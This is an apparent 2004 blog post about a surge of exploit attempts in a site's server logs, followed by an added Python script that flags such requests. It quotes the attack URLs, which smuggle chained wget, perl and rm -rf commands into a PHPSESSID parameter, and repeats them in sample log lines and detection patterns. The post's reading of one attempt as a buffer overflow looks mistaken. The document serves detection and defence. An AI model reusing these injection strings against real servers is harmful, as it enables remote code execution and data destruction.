You Keep A-Knockin’ But You Can’t Come In
Our server logs are showing quite a surge of attempted exploits today. Most of them are dumb hacks I’ve seen many times before, but there’s also a new one (at least to me): a script was requesting pages with URLs like this (I’ve added spaces to allow the string to wrap):
/weblog/weblog.php//weblog/?archive=112003&PHPSESSID= Image: spy.gif /spybot.txt;wget%20visualcoders.net; wget%20visualcoders.net /php.txt;wget%20visualcoders.net; wget%20visualcoders.net /zone.txt;perl%20spybot.txt;perl%20worm1.txt; perl%20ownz.txt;perl%20php.txt
There are thousands of these requests in our logs, sometimes up to a dozen in the same second. The user agent is always “LWP::Simple/5.xxx” so it’s a Perl script using the LWP library to make HTTP requests. I couldn’t find any reference to this on Google; do any of our server admin types know what’s up?
For now I’ve added the user agents that were doing this to our .htaccess list of bad bots, because it’s obviously someone up to no good.
UPDATE at 12/26/04 9:24:00 am:
Not to worry, lizardoids; LGF is not vulnerable to this attack.
Interestingly, there already seems to be a mutation of this script; our logs also show a large number of requests that look like this:
/article/Image: php.gif? https://20midomain.false.ca/~pillar/.zk/ 20midomain.false.ca sess_189f0f0889555397a4de5485dd611111; perl%20sess_189f0f0889555397a4de5485dd611111; wget%20midomain.false.ca sess_189f0f0889555397a4de5485dd611113; perl%20sess_189f0f0889555397a4de5485dd611113; wget%20midomain.false.ca sess_189f0f0889555397a4de5485dd611112; perl%20sess_189f0f0889555397a4de5485dd611112; wget%20midomain.false.ca sess_189f0f0889555397a4de5485dd611114; perl%20sess_189f0f0889555397a4de5485dd611114; rm%20-rf%20sess_189f0f0889555397a4de5485dd611113
… etc. etc.
This appears to be an attempt to cause a buffer overflow in the page request field.
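As an added example (not part of the original post, and not LGF's own tooling), here is a small log-triage script that picks both the original pattern and the mutation out of an Apache combined-format access log. It flags a request when the percent-decoded query string carries a remote URL in a parameter value, when it contains shell-style commands chained with semicolons (wget, perl, rm -rf, cd /tmp), or when the User-Agent starts with LWP::Simple, and it then counts flagged requests per source address and per second so a burst like "a dozen in the same second" stands out. The log lines, IP addresses (RFC 5737 test ranges), hostnames (example.invalid) and the LWP version string are all constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample log lines in Apache "combined" format. The first two mimic
# the two request shapes quoted in the post; the third is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Dec/2004:09:10:01 -0800] "GET /weblog/weblog.php?archive=112003&PHPSESSID=http://example.invalid/spy.gif?cmd=cd%20/tmp;wget%20example.invalid/spybot.txt;perl%20spybot.txt HTTP/1.0" 200 512 "-" "LWP::Simple/5.800"
203.0.113.5 - - [26/Dec/2004:09:10:01 -0800] "GET /article/?PHPSESSID=http://example.invalid/php.gif?cmd=wget%20example.invalid/sess_1234;perl%20sess_1234;rm%20-rf%20sess_1234 HTTP/1.0" 200 512 "-" "LWP::Simple/5.800"
198.51.100.7 - - [26/Dec/2004:09:10:02 -0800] "GET /weblog/?archive=112003 HTTP/1.1" 200 8192 "http://example.invalid/" "Mozilla/5.0 (X11; Linux)"
"""

# Apache combined log format: ip ident user [timestamp] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter whose value is itself a URL (PHPSESSID=http://...).
REMOTE_URL_RE = re.compile(r'=\s*https?://', re.IGNORECASE)

# Shell commands chained into a query string. Each command word must be
# preceded by a separator (start, ';', '&', '|', '=' or whitespace) so that
# ordinary words containing "cd" or "perl" are not matched on their own.
SHELL_RE = re.compile(
    r'(?:^|[;&|=\s])(?:(?:wget|curl|perl|rm\s+-rf)\s+\S+|cd\s+/\S*)',
    re.IGNORECASE,
)


def classify(entry):
    """Return the list of indicators that make one parsed log entry suspicious."""
    reasons = []
    decoded = unquote(entry["path"])  # undo %20 etc. before matching
    if REMOTE_URL_RE.search(decoded):
        reasons.append("remote-url-in-parameter")
    if SHELL_RE.search(decoded):
        reasons.append("shell-command-in-query")
    if entry["ua"].startswith("LWP::Simple"):
        reasons.append("lwp-simple-ua")
    return reasons


def analyse(log_text):
    """Parse combined-format lines and return (ip, timestamp, ua, reasons) for each flagged request."""
    flagged = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # lines not in combined format are skipped, not guessed at
        entry = m.groupdict()
        reasons = classify(entry)
        if reasons:
            flagged.append((entry["ip"], entry["ts"], entry["ua"], reasons))
    return flagged


def burst_counts(flagged):
    """Count flagged requests per (ip, second); the Apache timestamp already has one-second resolution."""
    return Counter((ip, ts) for ip, ts, _ua, _reasons in flagged)


if __name__ == "__main__":
    hits = analyse(SAMPLE_LOG)
    for ip, ts, ua, reasons in hits:
        print(f"{ts} {ip} {ua!r}: {', '.join(reasons)}")
    for (ip, ts), n in burst_counts(hits).most_common():
        print(f"{n} flagged request(s) from {ip} in second {ts}")
```

The User-Agent check is included because it matches what the post observed, but it is the weakest of the three indicators: the client picks that header, so an .htaccess rule keyed on "LWP::Simple" stops this particular script and nothing else. The query-string indicators are the more durable signal, and a server that never uses a request parameter as an include path or passes one to a shell is not affected by requests of this shape regardless of what they are called in the logs.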